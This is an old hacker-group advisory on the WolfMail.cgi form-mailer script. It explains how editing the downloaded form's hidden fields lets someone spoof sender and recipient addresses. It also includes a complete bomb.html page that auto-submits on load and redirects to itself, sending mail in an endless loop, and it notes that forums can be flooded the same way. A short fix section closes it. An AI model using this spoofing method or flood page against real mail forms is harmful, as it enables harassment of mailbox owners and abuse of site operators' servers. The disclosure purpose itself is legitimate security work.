wolfmail.cgi.txt

`  
*+-._\_.-+*  
WolfMail.cgi   
*+-._/_.-+*  
  
by Dead Beat  
The Advanced Knowledge Network  
http://www.advknowledge.net  
  
Mailirritation possibillity  
(fake and highfire an account)  
  
Wolfmail is a script similar to formmail.cgi which allows users to send mails   
from the page without using their Mailclient. However I guess the developers didn't  
want to make the script in the way that you configurate it in the actual script but  
send all the variables to the script from the actuall execution file.  
  
________  
FAKING:  
  
So as said most of the real configuration is done in the actual _.html file so for   
example the <input type="hidden" name="recipient" value="[email protected]">   
is specified in the _.html file of the composer. You can easily download the site and   
change the code. If, for example you, want to fake a mail to: "[email protected]" you   
just have to change the value field. Other things like subject and cc can be defined  
(read the installation papers to learn more)  
  
For Example:  
  
<input type="hidden" name="recipient" value="[email protected]">  
<input type="hidden" name="subject" value="From your site...">  
  
could be changed to:  
  
<input type="text" name="recipient" value="[email protected]">  
<input type="text" name="subject" value="Hi you">  
<input type="text" name="abemail" value="[email protected]" size="17" maxlength="140">  
  
that would allow you to self define those two values and send the mail from [email protected] to [email protected].   
  
Just so that I don't get any mails of any users here that don't understand this:  
When you download the html file to change all the stuff you have to set the path to where  
formmail.php actually is so if you download it you will find a line like this:  
  
<form action="scripts/formmail.php" method="POST" enctype="multipart/form-data">  
  
If you downloaded from http://www.mailscriptuser.com/contact.html you have to change the upper line to:  
  
<form action="http://www.mailscriptuser.com/scripts/formmail.php" method="POST" enctype="multipart/form-data">  
  
Got that? Good next little security vuln. attackers could trip over is the kind of bombing an adress.  
  
  
___________  
HIGH FIRE  
  
There is a variable called "redirect" this allows you to send the user to a site after the actual  
mailing is done.(Something that tells you such as: "Thanks! Your mail was send" or whatever) this   
option looks like this  
  
<input TYPE="HIDDEN" name="redirect" value="http://www.domain.com/contact/mail/thanks.htm">  
  
Since the script itself doesn't check(log) your IP an   
attacker could download the html file, predefine all values(like message, subject, recipient,...) and then   
set a java-script that reloads the site and set the redirect url to the html with the predefined values this   
way a loop would run and send, send and send emails all over and over again.  
  
EXAMPLE bomb.html:  
<html>  
<head>  
<body onload="document.bomber.submit();">  
<form name="bomber" method="POST" action="http://www.domain.com/contact/mail/wolfmail.cgi">  
<input TYPE="text" name="required" value="adMail-Text|abemail">  
<input TYPE="text" name="subject" value="Exploiting wolfmail.cgi">  
<input TYPE="text" name="recipient" value="[email protected]">  
<input TYPE="text" name="redirect" value="C:\Exploit\bomb.html">  
<input type="text" name="aaName" value="Wolfmail Exploiter" size="17" maxlength="140">  
<input type="text" name="abemail" value="[email protected]" size="17" maxlength="140">  
<textarea name="adMail-Text" rows="4" cols="13" wrap="virtual">Bombing text goes here</textarea>  
<input type="submit" value="submit">  
</body>  
</head>  
</html>  
  
The upper script can of course be used on many forms, so other mailforms may be affected too.   
It is also possible to flood forums with such script! I hope you will re-configure and check   
out your forms and the actual scripts behind it for this vulnerabillity. If you have found   
another script that this trick works with mail me I will include them here and you will get   
a credit ofcourse!  
  
SOLUTION  
You should change the script or use another one so that the IP's you send from can only be used   
ONCE and let the email be predefined in a file or in the actual script.  
  
I am quite sure that these aren't all of the bugs but I didn't really go into the code. This is   
just what I saw first. Thanks to b0iler and Ravish! Greetings out to StartX, Road^K|ll, Silver   
and all of my friends I forgot!  
  
Truthfully,  
Dead Beat, [email protected]  
The Advanced Knowledge Network  
http://www.advknowledge.net  
  
Want more, new, better BUGS and other Informations? Then visit us!  
  
  
--   
Best regards,  
Dead Beat   
The Advanced Knowledge Network  
http://www.advknowledge.net  
mailto:[email protected]  
  
  
`